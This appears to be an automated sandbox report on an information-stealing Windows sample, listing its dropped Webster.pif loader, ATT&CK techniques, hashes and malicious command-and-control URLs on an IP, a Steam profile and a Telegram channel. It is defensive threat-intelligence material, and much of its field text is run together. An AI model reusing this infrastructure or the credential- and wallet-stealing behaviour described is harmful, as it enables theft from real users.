                        Source: Yara match File source: 11.2.Webster.pif.1b4b810.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 11.2.Webster.pif.17ad098.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00AF696E
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00AF6E32

                        ATT&CK matrix. Tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
                        Techniques listed with a count in the matrix: Valid Accounts, Windows Management Instrumentation, DLL Side-Loading, Exploitation for Privilege Escalation, Disable or Modify Tools, OS Credential Dumping, System Time Discovery, Archive Collected Data, Ingress Tool Transfer, System Shutdown/Reboot, Native API, Deobfuscate/Decode Files or Information, Input Capture, Account Discovery, Data from Local System, Encrypted Channel, Obfuscated Files or Information, File and Directory Discovery, Non-Application Layer Protocol, Access Token Manipulation, Software Packing, System Information Discovery, Clipboard Data, Application Layer Protocol, Process Injection, Security Software Discovery, Masquerading, Virtualization/Sandbox Evasion, Process Discovery, Application Window Discovery, System Owner/User Discovery.

                        Behavior Graph ID: 1483134 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100
                        • Domains/IPs: steamcommunity.com; FGQNrbtYCvA.FGQNrbtYCvA; 2 other IPs or domains
                        • Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
                        • file.exe (started). Signature: Found stalling execution ending in API Sleep call
                        • cmd.exe (started by file.exe). Dropped: C:\Users\user\AppData\Local\...\Webster.pif, PE32. Signature: Drops PE files with a suspicious file extension. Started: Webster.pif, cmd.exe, conhost.exe, 7 other processes
                        • Webster.pif (started by cmd.exe). DNS/IP: steamcommunity.com 23.197.127.21, 443, 64167 AKAMAI-ASN1EU United States; 5.75.212.60, 443, 64168, 64169 HETZNER-ASDE Germany. Dropped: C:\ProgramData\vcruntime140.dll, PE32; C:\ProgramData\softokn3.dll, PE32; C:\ProgramData\nss3.dll, PE32; 3 other files (none is malicious). Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

                        Source | Detection | Scanner | Label | Link
                        file.exe | 29% | ReversingLabs | Win32.Trojan.Generic

                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\freebl3.dll | 0% | ReversingLabs
                        C:\ProgramData\mozglue.dll | 0% | ReversingLabs
                        C:\ProgramData\msvcp140.dll | 0% | ReversingLabs
                        C:\ProgramData\nss3.dll | 0% | ReversingLabs
                        C:\ProgramData\softokn3.dll | 0% | ReversingLabs
                        C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Temp\229536\Webster.pif | 7% | ReversingLabs

                        No Antivirus matches
                        No Antivirus matches

                        Source | Detection | Scanner | Label | Link
                        http://www.mozilla.com/en-US/blocklist/ | 0% | URL Reputation | safe
                        https://mozilla.org0/ | 0% | URL Reputation | safe
                        http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
                        https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | URL Reputation | safe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                        http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | 0% | URL Reputation | safe
                        https://steamcommunity.com/?subsection=broadcasts | 0% | Avira URL Cloud | safe
                        https://5.75.212.60/sqls.dll | 100% | Avira URL Cloud | malware
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | 0% | URL Reputation | safe
                        https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
                        https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | Avira URL Cloud | safe
                        https://store.steampowered.com/subscriber_agreement/ | 0% | Avira URL Cloud | safe
                        https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
                        https://5.75.212.60/msvcp140.dllG | 100% | Avira URL Cloud | malware
                        https://5.75.212.60/er | 100% | Avira URL Cloud | malware
                        http://www.valvesoftware.com/legal.htm | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | Avira URL Cloud | safe
                        https://steamcommunity.com/profiles/76561199747278259/badges | 100% | Avira URL Cloud | malware
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english | 0% | Avira URL Cloud | safe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english | 0% | Avira URL Cloud | safe
                        https://5.75.212.60/- | 100% | Avira URL Cloud | malware
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_ | 0% | Avira URL Cloud | safe
                        https://5.75.212.60/) | 100% | Avira URL Cloud | malware
                        https://store.steampowered.com/privac | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=e | 0% | Avira URL Cloud | safe
                        http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | Avira URL Cloud | safe
                        http://store.steampowered.com/privacy_agreement/ | 0% | Avira URL Cloud | safe
                        https://t.me/armad2a | 100% | Avira URL Cloud | malware
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe
                        https://store.steampowered.com/points/shop/ | 0% | Avira URL Cloud | safe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | Avira URL Cloud | safe
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0 | 0% | Avira URL Cloud | safe
                        https://5.75.212.60/softokn3.dllNm | 100% | Avira URL Cloud | malware
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | Avira URL Cloud | safe
                        https://store.steampowered.com/privacy_agreement/ | 0% | Avira URL Cloud | safe
                        https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                        https://steamcommunity.com/fi0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%Avira URL Cloudsafe
                        https://5.75.212.60/df100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                        https://5.75.212.60/b100%Avira URL Cloudmalware
                        https://5.75.212.60/e100%Avira URL Cloudmalware
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%Avira URL Cloudsafe
                        https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
                        https://5.75.212.60/Data100%Avira URL Cloudmalware
                        https://store.steampowered.com/about/0%Avira URL Cloudsafe
                        https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
                        https://help.steampowered.com/en/0%Avira URL Cloudsafe
                        https://5.75.212.60/softokn3.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/market/0%Avira URL Cloudsafe
                        https://store.steampowered.com/news/0%Avira URL Cloudsafe
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                        http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259/inventory/100%Avira URL Cloudmalware
                        https://5.75.212.60/mozglue.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                        https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                        https://5.75.212.60/100%Avira URL Cloudmalware
                        https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%Avira URL Cloudsafe
                        https://5.75.212.60/msvcp140.dllHA100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a0%Avira URL Cloudsafe
                        https://5.75.212.60/softokn3.dllI100%Avira URL Cloudmalware
                        https://5.75.212.60/freebl3.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                        https://5.75.212.60/nss3.dll100%Avira URL Cloudmalware
                        https://store.steampowered.com/legal/0%Avira URL Cloudsafe
                        https://5.75.212.60/ts8100%Avira URL Cloudmalware
                        https://5.75.212.60/msvcp140.dll100%Avira URL Cloudmalware
                        http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                        https://5.75.212.60/saenh.dllv100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        https://store.steampowered.com/0%Avira URL Cloudsafe
                        https://5.75.212.60CBAFIJ0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259:0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.197.127.21 | true | true | | unknown
FGQNrbtYCvA.FGQNrbtYCvA | unknown | unknown | false | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown
86.23.85.13.in-addr.arpa | unknown | unknown | false | | unknown
                                • Avira URL Cloud: safe
                                unknown
                                https://steamcommunity.com/profiles/76561199747278259/inventory/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgWebster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://steamcommunity.com/discussions/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://store.steampowered.com/stats/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://store.steampowered.com/steam_refunds/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://5.75.212.60/msvcp140.dllHAWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAEGHJK.11.drfalse
                                • URL Reputation: safe
                                unknown
                                https://5.75.212.60/softokn3.dllIWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&aWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://steamcommunity.com/workshop/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://store.steampowered.com/legal/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContWebster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sqlite.org/copyright.html.Webster.pif, 0000000B.00000002.3327151135.000000000CA8D000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://5.75.212.60/ts8Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoAEGHJK.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://5.75.212.60/saenh.dllvWebster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                unknown
                                https://store.steampowered.com/76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://5.75.212.60CBAFIJWebster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • URL Reputation: safe
                                unknown
                                https://steamcommunity.com/profiles/76561199747278259:Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IP | Domain | Country | ASN | ASN Name | Malicious
                                5.75.212.60 | unknown | Germany | 24940 | HETZNER-ASDE | false
                                23.197.127.21 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | true
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1483134
                                Start date and time:2024-07-26 17:52:12 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 45s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@22/49@4/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 88
                                • Number of non-executed functions: 305
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: file.exe
                                Time | Type | Description
                                11:53:02 | API Interceptor | 1x Sleep call for process: file.exe modified
                                11:53:05 | API Interceptor | 959x Sleep call for process: Webster.pif modified
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):51200
                                                                                Entropy (8bit):0.8745947603342119
                                                                                Encrypted:false
                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.136471148832945
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):10237
                                                                                Entropy (8bit):5.498288591230544
                                                                                Encrypted:false
                                                                                SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                Malicious:false
                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
